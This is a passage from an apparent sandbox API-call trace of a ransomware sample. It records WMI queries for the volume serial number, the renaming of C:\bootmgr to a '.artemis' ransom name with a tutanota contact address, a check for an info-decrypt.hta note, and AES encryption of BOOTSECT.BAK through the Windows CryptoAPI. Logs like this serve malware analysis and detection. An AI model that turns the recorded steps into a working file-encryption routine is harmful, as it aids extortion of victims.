Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x641efb0 | out: ppvObject=0x641efb0*=0x0) returned 0x80004002 [0148.089] WbemLocator:IClassFactory:CreateInstance (in: This=0x672f418, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641efc4 | out: ppvObject=0x641efc4*=0x6736e18) returned 0x0 [0148.089] WbemLocator:IUnknown:Release (This=0x672f418) returned 0x0 [0148.089] WbemLocator:IUnknown:QueryInterface (in: This=0x6736e18, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641ebe4 | out: ppvObject=0x641ebe4*=0x6736e18) returned 0x0 [0148.089] WbemLocator:IUnknown:QueryInterface (in: This=0x6736e18, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x641eba0 | out: ppvObject=0x641eba0*=0x0) returned 0x80004002 [0148.090] WbemLocator:IUnknown:AddRef (This=0x6736e18) returned 0x3 [0148.090] WbemLocator:IUnknown:QueryInterface (in: This=0x6736e18, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x641e4fc | out: ppvObject=0x641e4fc*=0x0) returned 0x80004002 [0148.090] WbemLocator:IUnknown:QueryInterface (in: This=0x6736e18, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x641e4ac | out: ppvObject=0x641e4ac*=0x0) returned 0x80004002 [0148.090] WbemLocator:IUnknown:QueryInterface (in: This=0x6736e18, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641e4b8 | out: ppvObject=0x641e4b8*=0x0) returned 0x80004002 [0148.090] CoGetContextToken (in: pToken=0x641e518 | out: pToken=0x641e518) returned 0x0 [0148.090] CoGetContextToken (in: pToken=0x641e920 | out: pToken=0x641e920) returned 0x0 [0148.090] WbemLocator:IUnknown:QueryInterface (in: This=0x6736e18, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641e9b0 | out: ppvObject=0x641e9b0*=0x0) returned 0x80004002 [0148.090] WbemLocator:IUnknown:Release (This=0x6736e18) returned 0x2 [0148.090] WbemLocator:IUnknown:Release (This=0x6736e18) returned 0x1 [0148.090] CoGetContextToken (in: pToken=0x641ef90 | out: pToken=0x641ef90) returned 0x0 [0148.090] CoGetContextToken (in: pToken=0x641eef0 | out: pToken=0x641eef0) returned 0x0 [0148.090] WbemLocator:IUnknown:QueryInterface (in: This=0x6736e18, riid=0x641efc0*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x641efbc | out: ppvObject=0x641efbc*=0x6736e18) returned 0x0 [0148.090] WbemLocator:IUnknown:AddRef (This=0x6736e18) returned 0x3 [0148.090] WbemLocator:IUnknown:Release (This=0x6736e18) returned 0x2 [0148.090] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738310, puCount=0x641f158 | out: puCount=0x641f158*=0x2) returned 0x0 [0148.090] WbemDefPath:IWbemPath:GetText (in: This=0x6738310, lFlags=8, puBuffLength=0x641f154*=0x0, pszText=0x0 | out: puBuffLength=0x641f154*=0xf, pszText=0x0) returned 0x0 [0148.090] WbemDefPath:IWbemPath:GetText (in: This=0x6738310, lFlags=8, puBuffLength=0x641f154*=0xf, pszText="00000000000000" | out: puBuffLength=0x641f154*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0148.091] CoCreateInstance (in: rclsid=0x745f1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x745f12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x641f030 | out: ppv=0x641f030*=0x6736e08) returned 0x0 [0148.091] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6736e08, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x641f0c4 | out: ppNamespace=0x641f0c4*=0x67371c4) returned 0x0 [0148.885] WbemLocator:IUnknown:QueryInterface (in: This=0x67371c4, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641ef60 | out: ppvObject=0x641ef60*=0x781184) returned 0x0 [0148.886] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x781184, pProxy=0x67371c4, pAuthnSvc=0x641efb0, pAuthzSvc=0x641efac, pServerPrincName=0x641efa4, pAuthnLevel=0x641efa8, pImpLevel=0x641ef98, pAuthInfo=0x641ef9c, pCapabilites=0x641efa0 | out: pAuthnSvc=0x641efb0*=0xa, pAuthzSvc=0x641efac*=0x0, pServerPrincName=0x641efa4, pAuthnLevel=0x641efa8*=0x6, pImpLevel=0x641ef98*=0x2, pAuthInfo=0x641ef9c, pCapabilites=0x641efa0*=0x1) returned 0x0 [0148.886] WbemLocator:IUnknown:Release (This=0x781184) returned 0x1 [0148.886] WbemLocator:IUnknown:QueryInterface (in: This=0x67371c4, riid=0x745f10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641ef54 | out: ppvObject=0x641ef54*=0x7811a4) returned 0x0 [0148.886] WbemLocator:IUnknown:QueryInterface (in: This=0x67371c4, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641ef50 | out: ppvObject=0x641ef50*=0x781184) returned 0x0 [0148.886] WbemLocator:IClientSecurity:SetBlanket (This=0x781184, pProxy=0x67371c4, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0148.886] WbemLocator:IUnknown:Release (This=0x781184) returned 0x2 [0148.886] WbemLocator:IUnknown:Release (This=0x7811a4) returned 0x1 [0148.886] CoTaskMemFree (pv=0x77e058) [0148.886] WbemLocator:IUnknown:Release (This=0x6736e08) returned 0x0 [0148.886] WbemLocator:IUnknown:QueryInterface (in: This=0x67371c4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641eb50 | out: ppvObject=0x641eb50*=0x7811a4) returned 0x0 [0148.886] WbemLocator:IUnknown:QueryInterface (in: This=0x7811a4, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x641eb0c | out: ppvObject=0x641eb0c*=0x0) returned 0x80004002 [0148.887] WbemLocator:IUnknown:QueryInterface (in: This=0x7811a4, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x641e92c | out: ppvObject=0x641e92c*=0x0) returned 0x80004002 [0148.887] WbemLocator:IUnknown:AddRef (This=0x7811a4) returned 0x3 [0148.887] WbemLocator:IUnknown:QueryInterface (in: This=0x7811a4, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x641e46c | out: ppvObject=0x641e46c*=0x0) returned 0x80004002 [0148.887] WbemLocator:IUnknown:QueryInterface (in: This=0x7811a4, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x641e41c | out: ppvObject=0x641e41c*=0x0) returned 0x80004002 [0148.888] WbemLocator:IUnknown:QueryInterface (in: This=0x7811a4, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641e428 | out: ppvObject=0x641e428*=0x781104) returned 0x0 [0148.888] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x781104, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x641e430 | out: pCid=0x641e430*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0148.888] WbemLocator:IUnknown:Release (This=0x781104) returned 0x3 [0148.888] CoGetContextToken (in: pToken=0x641e488 | out: pToken=0x641e488) returned 0x0 [0148.888] CoGetContextToken (in: pToken=0x641e890 | out: pToken=0x641e890) returned 0x0 [0148.888] WbemLocator:IUnknown:QueryInterface (in: This=0x7811a4, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641e920 | out: ppvObject=0x641e920*=0x78118c) returned 0x0 [0148.888] WbemLocator:IRpcOptions:Query (in: This=0x78118c, pPrx=0x7811a4, dwProperty=2, pdwValue=0x641e948 | out: pdwValue=0x641e948) returned 0x80004002 [0148.888] WbemLocator:IUnknown:Release (This=0x78118c) returned 0x3 [0148.888] WbemLocator:IUnknown:Release (This=0x7811a4) returned 0x2 [0148.888] CoGetContextToken (in: pToken=0x641ee60 | out: pToken=0x641ee60) returned 0x0 [0148.888] CoGetContextToken (in: pToken=0x641edc0 | out: pToken=0x641edc0) returned 0x0 [0148.888] WbemLocator:IUnknown:QueryInterface (in: This=0x7811a4, riid=0x641ee90*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x641ee8c | out: ppvObject=0x641ee8c*=0x67371c4) returned 0x0 [0148.888] WbemLocator:IUnknown:AddRef (This=0x67371c4) returned 0x4 [0148.888] WbemLocator:IUnknown:Release (This=0x67371c4) returned 0x3 [0148.888] WbemLocator:IUnknown:Release (This=0x67371c4) returned 0x2 [0148.888] SysStringLen (param_1=0x0) returned 0x0 [0148.888] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738380, puCount=0x641f228 | out: puCount=0x641f228*=0x0) returned 0x0 [0148.889] WbemDefPath:IWbemPath:GetText (in: This=0x6738380, lFlags=2, puBuffLength=0x641f224*=0x0, pszText=0x0 | out: puBuffLength=0x641f224*=0x20, pszText=0x0) returned 0x0 [0148.889] WbemDefPath:IWbemPath:GetText (in: This=0x6738380, lFlags=2, puBuffLength=0x641f224*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x641f224*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0148.889] CoGetContextToken (in: pToken=0x641ee98 | out: pToken=0x641ee98) returned 0x0 [0148.889] WbemLocator:IUnknown:AddRef (This=0x7811a4) returned 0x3 [0148.889] WbemLocator:IUnknown:QueryInterface (in: This=0x7811a4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641ed2c | out: ppvObject=0x641ed2c*=0x7811a4) returned 0x0 [0148.889] WbemLocator:IUnknown:Release (This=0x7811a4) returned 0x3 [0148.889] WbemLocator:IUnknown:Release (This=0x7811a4) returned 0x2 [0148.889] WbemDefPath:IWbemPath:GetText (in: This=0x6738380, lFlags=2, puBuffLength=0x641f22c*=0x0, pszText=0x0 | out: puBuffLength=0x641f22c*=0x20, pszText=0x0) returned 0x0 [0148.889] WbemDefPath:IWbemPath:GetText (in: This=0x6738380, lFlags=2, puBuffLength=0x641f22c*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x641f22c*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0148.889] IWbemServices:GetObject (in: This=0x67371c4, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x641f1e0*=0x0, ppCallResult=0x0 | out: ppObject=0x641f1e0*=0x673b468, ppCallResult=0x0) returned 0x0 [0149.289] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738310, puCount=0x641f1e0 | out: puCount=0x641f1e0*=0x2) returned 0x0 [0149.289] WbemDefPath:IWbemPath:GetText (in: This=0x6738310, lFlags=4, puBuffLength=0x641f1dc*=0x0, pszText=0x0 | out: puBuffLength=0x641f1dc*=0xf, pszText=0x0) returned 0x0 [0149.289] WbemDefPath:IWbemPath:GetText (in: This=0x6738310, lFlags=4, puBuffLength=0x641f1dc*=0xf, pszText="00000000000000" | out: puBuffLength=0x641f1dc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0149.289] IWbemClassObject:Get (in: This=0x673b468, wszName="VolumeSerialNumber", lFlags=0, pVal=0x641f1dc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x34c2eac*=0, plFlavor=0x34c2eb0*=0 | out: pVal=0x641f1dc*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x34c2eac*=8, plFlavor=0x34c2eb0*=0) returned 0x0 [0149.290] SysStringByteLen (bstr="9C354B42") returned 0x10 [0149.290] SysStringByteLen (bstr="9C354B42") returned 0x10 [0149.290] IWbemClassObject:Get (in: This=0x673b468, wszName="VolumeSerialNumber", lFlags=0, pVal=0x641f1e4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x34c2eac*=8, plFlavor=0x34c2eb0*=0 | out: pVal=0x641f1e4*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x34c2eac*=8, plFlavor=0x34c2eb0*=0) returned 0x0 [0149.290] SysStringByteLen (bstr="9C354B42") returned 0x10 [0149.290] SysStringByteLen (bstr="9C354B42") returned 0x10 [0149.290] GetFullPathNameW (in: lpFileName="C:\\bootmgr", nBufferLength=0x105, lpBuffer=0x641ede4, lpFilePart=0x0 | out: lpBuffer="C:\\bootmgr", lpFilePart=0x0) returned 0xa [0149.290] GetFullPathNameW (in: lpFileName="C:\\bootmgr.id-9C354B42.[khalate@tutanota.com].artemis", nBufferLength=0x105, lpBuffer=0x641ede4, lpFilePart=0x0 | out: lpBuffer="C:\\bootmgr.id-9C354B42.[khalate@tutanota.com].artemis", lpFilePart=0x0) returned 0x35 [0149.290] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x641f244) returned 1 [0149.290] GetFileAttributesExW (in: lpFileName="C:\\bootmgr" (normalized: "c:\\bootmgr"), fInfoLevelId=0x0, lpFileInformation=0x641f2c0 | out: lpFileInformation=0x641f2c0*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x84a3bb2c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5db2a)) returned 1 [0149.290] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x641f240) returned 1 [0149.291] MoveFileW (lpExistingFileName="C:\\bootmgr" (normalized: "c:\\bootmgr"), lpNewFileName="C:\\bootmgr.id-9C354B42.[khalate@tutanota.com].artemis" (normalized: "c:\\bootmgr.id-9c354b42.[khalate@tutanota.com].artemis")) returned 1 [0149.645] GetFullPathNameW (in: lpFileName="C:\\BOOTSECT.BAK", nBufferLength=0x105, lpBuffer=0x641ee88, lpFilePart=0x0 | out: lpBuffer="C:\\BOOTSECT.BAK", lpFilePart=0x0) returned 0xf [0149.645] GetFullPathNameW (in: lpFileName="C:\\BOOTSECT.BAK", nBufferLength=0x105, lpBuffer=0x641ee80, lpFilePart=0x0 | out: lpBuffer="C:\\BOOTSECT.BAK", lpFilePart=0x0) returned 0xf [0149.645] GetFullPathNameW (in: lpFileName="C:\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x641ee88, lpFilePart=0x0 | out: lpBuffer="C:\\info-decrypt.hta", lpFilePart=0x0) returned 0x13 [0149.645] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x641f2e8) returned 1 [0149.646] GetFileAttributesExW (in: lpFileName="C:\\info-decrypt.hta" (normalized: "c:\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x641f364 | out: lpFileInformation=0x641f364*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe1f09e0, ftCreationTime.dwHighDateTime=0x1d6a20a, ftLastAccessTime.dwLowDateTime=0xfe1f09e0, ftLastAccessTime.dwHighDateTime=0x1d6a20a, ftLastWriteTime.dwLowDateTime=0xfe1f09e0, ftLastWriteTime.dwHighDateTime=0x1d6a20a, nFileSizeHigh=0x0, nFileSizeLow=0x1557)) returned 1 [0149.646] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x641f2e4) returned 1 [0149.646] GetFullPathNameW (in: lpFileName="C:\\BOOTSECT.BAK", nBufferLength=0x105, lpBuffer=0x641ee04, lpFilePart=0x0 | out: lpBuffer="C:\\BOOTSECT.BAK", lpFilePart=0x0) returned 0xf [0149.646] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x641f2b0) returned 1 [0149.646] GetFileAttributesExW (in: lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), fInfoLevelId=0x0, lpFileInformation=0x34c3230 | out: lpFileInformation=0x34c3230*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac54a060, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac54a060, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac54a060, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0150.707] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x641f2ac) returned 1 [0150.707] GetFullPathNameW (in: lpFileName="C:\\BOOTSECT.BAK", nBufferLength=0x105, lpBuffer=0x641ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\BOOTSECT.BAK", lpFilePart=0x0) returned 0xf [0150.707] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x641f1e4) returned 1 [0150.707] CreateFileW (lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x460 [0150.707] GetFileType (hFile=0x460) returned 0x1 [0150.707] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x641f1e0) returned 1 [0150.707] GetFileType (hFile=0x460) returned 0x1 [0150.707] GetFileSize (in: hFile=0x460, lpFileSizeHigh=0x641f2ec | out: lpFileSizeHigh=0x641f2ec*=0x0) returned 0x2000 [0150.708] ReadFile (in: hFile=0x460, lpBuffer=0x3514e50, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x641f298, lpOverlapped=0x0 | out: lpBuffer=0x3514e50*, lpNumberOfBytesRead=0x641f298*=0x2000, lpOverlapped=0x0) returned 1 [0150.722] CloseHandle (hObject=0x460) returned 1 [0150.722] CryptAcquireContextW (in: phProv=0x641f238, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x641f238*=0x6eed18) returned 1 [0150.724] CryptGenRandom (in: hProv=0x6eed18, dwLen=0x10, pbBuffer=0x3517514 | out: pbBuffer=0x3517514) returned 1 [0152.981] CryptImportKey (in: hProv=0x6eed18, pbData=0x35bd854, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x641f208 | out: phKey=0x641f208*=0x77ac30) returned 1 [0152.981] CryptContextAddRef (hProv=0x6eed18, pdwReserved=0x0, dwFlags=0x0) returned 1 [0152.981] CryptContextAddRef (hProv=0x6eed18, pdwReserved=0x0, dwFlags=0x0) returned 1 [0152.982] CryptDuplicateKey (in: hKey=0x77ac30, pdwReserved=0x0, dwFlags=0x0, phKey=0x641f1f8 | out: phKey=0x641f1f8*=0x77b2f0) returned 1 [0152.982] CryptContextAddRef (hProv=0x6eed18, pdwReserved=0x0, dwFlags=0x0) returned 1 [0152.982] CryptSetKeyParam (hKey=0x77b2f0, dwParam=0x4, pbData=0x35bd934*=0x1, dwFlags=0x0) returned 1 [0152.982] CryptSetKeyParam (hKey=0x77b2f0, dwParam=0x1, pbData=0x35bd900, dwFlags=0x0) returned 1 [0152.982] CryptEncrypt (in: hKey=0x77b2f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x35bd944*, pdwDataLen=0x641f264*=0x2010, dwBufLen=0x2010 | out: pbData=0x35bd944*, pdwDataLen=0x641f264*=0x2010) returned 1 [0152.982] CryptEncrypt (in: hKey=0x77b2f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x35bf978*, pdwDataLen=0x641f26c*=0x0, dwBufLen=0x10 | out: pbData=0x35bf978*, pdwDataLen=0x641f26c*=0x10) returned 1 [0152.984] CryptDestroyKey (hKey=0x77ac30) returned 1 [0152.984] CryptReleaseContext (hProv=0x6eed18, dwFlags=0x0) returned 1 [0152.984] CryptReleaseContext (hProv=0x6eed18, dwFlags=0x0) returned 1 [0152.984] GetFullPathNameW (in: lpFileName="C:\\BOOTSECT.BAK", nBufferLength=0x105, lpBuffer=0x641ecdc, lpFilePart=0x0 | out: lpBuffer="C:\\BOOTSECT.BAK", lpFilePart=0x0) returned 0xf [0152.984] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x641f1d0) returned 1 [0152.984] CreateFileW (lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0152.987] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x641e008) returned 1 [0152.987] CoTaskMemAlloc (cb=0x20c) returned 0x6f2e520 [0152.987] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x6f2e520 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0152.987] CoTaskMemFree (pv=0x6f2e520) [0152.987] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x641ecc4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0152.988] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x641f20c | out: ppv=0x641f20c*=0x72015c) returned 0x0 [0152.988] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x641f204 | out: pAptType=0x641f204*=1) returned 0x0 [0152.988] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x641f208 | out: ppvObject=0x641f208*=0x0) returned 0x80004002 [0152.988] IUnknown:Release (This=0x72015c) returned 0x1 [0152.989] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x641eb78 | out: ppv=0x641eb78*=0x6736e08) returned 0x0 [0152.989] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736e08, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x641ed90 | out: ppvObject=0x641ed90*=0x0) returned 0x80004002 [0152.989] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736e08, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641eda4 | out: ppvObject=0x641eda4*=0x6738850) returned 0x0 [0152.990] WbemDefPath:IUnknown:Release (This=0x6736e08) returned 0x0 [0152.990] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738850, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641e9c4 | out: ppvObject=0x641e9c4*=0x6738850) returned 0x0 [0152.990] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738850, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x641e980 | out: ppvObject=0x641e980*=0x0) returned 0x80004002 [0152.990] WbemDefPath:IUnknown:AddRef (This=0x6738850) returned 0x3 [0152.990] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738850, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x641e2dc | out: ppvObject=0x641e2dc*=0x0) returned 0x80004002 [0152.990] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738850, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x641e28c | out: ppvObject=0x641e28c*=0x0) returned 0x80004002 [0152.990] WbemDefPath:IUnknown:QueryInterface (in: 